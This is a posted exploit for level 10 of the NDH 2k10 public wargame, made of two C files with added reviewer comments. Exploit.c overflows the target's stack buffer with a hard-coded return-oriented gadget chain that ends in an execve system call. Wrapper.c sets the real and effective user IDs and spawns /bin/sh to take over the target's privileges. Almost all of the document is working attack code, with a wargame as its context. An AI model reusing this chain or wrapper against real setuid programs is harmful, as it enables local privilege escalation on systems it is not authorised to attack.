raisep0wn

NDH 2k10 public wargame, level10, exploit

May 28th, 2011
  1. /***********************************
  2. |   Exploit.c                      |
  3. ***********************************/
  4. #include <stdio.h>
  5. #include <stdlib.h>
  6. #include <unistd.h>
  7. #include <string.h>
  8.  
  9. //Target program
/* Absolute path of the program that main() executes. */
char target_path[] = "/home/level10/level10";

/*
 * Environment passed to the target: exactly one string, then the NULL
 * terminator. main() uses the length of env[0] when it computes an address,
 * so changing this string changes that address.
 */
char *env[] = {
    "/tmp/wrapper",
    NULL,
};
  12.  
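/*
 * Builds the single command-line argument for the level10 target and
 * executes the target with it and with the one-entry environment `env`.
 *
 * The argument is 12 filler bytes followed by a sequence of hard-coded
 * 32-bit code addresses (see the per-line comments) and one computed
 * address, `shaddr`. Per those comments the sequence ends in `int 0x80`
 * with eax = 0xb, ebx = shaddr and ecx/edx loaded with 0xffffffff and then
 * incremented once each.
 *
 * Reviewer notes (defensive reading):
 *  - Every address is a constant: the code addresses in 0x0804xxxx..0x0808xxxx
 *    and the stack top 0xbffffffc. The listing therefore assumes the target's
 *    code and initial stack sit at the same addresses on every run; stack
 *    randomization or a position-independent build of the target would
 *    invalidate these constants.
 *  - The 12 filler bytes in front of the first address suggest the target
 *    copies its argument into a small stack buffer without a length check.
 *    The target's source is not on this page, so treat that as an
 *    assumption; a bounded copy and a stack protector are the usual fixes.
 *
 * Returns 1 when the target cannot be executed. On success execle() does
 * not return.
 */
int main(int argc, char *argv[])
{
    char arg[89]; /* 88 payload bytes + terminating NUL */
    char ebx[5];  /* shaddr as 4 little-endian bytes + NUL */

    (void)argc;
    (void)argv;

    /*
     * Expected address of the env[0] string inside the target's initial
     * stack: stack top minus the executable path and env[0], each with its
     * terminator. Presumes the fixed layout described above.
     */
    size_t tail = strlen(target_path) + 1 + strlen(env[0]) + 1;
    unsigned int shaddr = 0xbffffffc - (unsigned int)tail;

    /* Serialize shaddr least-significant byte first. */
    snprintf(ebx, sizeof ebx, "%c%c%c%c",
             (int)(shaddr & 0xFFu),
             (int)((shaddr >> 8) & 0xFFu),
             (int)((shaddr >> 16) & 0xFFu),
             (int)((shaddr >> 24) & 0xFFu));

    /* Argument layout; each literal stays separate so hex escapes end cleanly. */
    snprintf(arg, sizeof arg,
    "------------"     /* filler */
    "\x41\x23\x05\x08" /* pop edx ; pop ecx ; pop ebx ;; */
    "\xff\xff\xff\xff" /* edx */
    "\xff\xff\xff\xff" /* ecx */
    "%s"               /* ebx */
    "\xe9\xec\x04\x08" /* inc edx ; add al 0x83 ;; */
    "\xa6\x53\x08\x08" /* inc ecx ; adc al 0x39 ;; */
    "\x5c\x82\x04\x08" /* xor eax eax ; inc eax ;;  eax=0x1 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0x2 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0x3 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0x4 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0x5 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0x6 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0x7 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0x8 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0x9 */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0xa */
    "\x5e\x82\x04\x08" /* inc eax ;;            eax=0xb */
    "\x60\x82\x04\x08" /* int 0x80 ; pop ebp ;; */
    "\xf0\xff\xff\xbf" /* ebp (don't care) */
    , ebx);

    execle(target_path, target_path, arg, (char *)0, env);

    /*
     * execle() returns only on failure, and then returns -1. The original
     * `if (!execle(...))` test was therefore never true and a failed exec
     * fell through to `return 0`. perror() appends ": <reason>" and a
     * newline itself, so the message carries no trailing "\n".
     */
    perror("Unable to execute the target");
    return 1;
}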
  56.  
  57. /***********************************
  58. |   Wrapper.c                      |
  59. ***********************************/
  60. #include <stdio.h>
  61. #include <stdlib.h>
  62. #include <unistd.h>
  63.  
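/*
 * Sets both the real and the effective user ID to the current effective
 * user ID, then replaces the process image with /bin/sh.
 *
 * Reviewer notes:
 *  - The original ignored the result of setreuid() and went on to exec the
 *    shell regardless; the call is now checked and the program stops on
 *    failure.
 *  - The original passed a null pointer as execv()'s argument vector. The
 *    vector must be a NULL-terminated array, so a minimal one is supplied.
 *  - Detection angle: the listing places this binary at /tmp/wrapper, so a
 *    process image under /tmp that calls setreuid() and immediately execs a
 *    shell is the observable pattern here.
 *
 * Returns 1 if setreuid() or execv() fails. On success execv() does not
 * return.
 */
int main(int argc, char* argv[])
{
    (void)argc;
    (void)argv;

    uid_t euid = geteuid();
    if (setreuid(euid, euid) != 0) {
        perror("setreuid");
        return 1;
    }

    char *const sh_argv[] = { "sh", NULL };
    execv("/bin/sh", sh_argv);

    /* Reached only when execv() failed. */
    perror("execv");
    return 1;
}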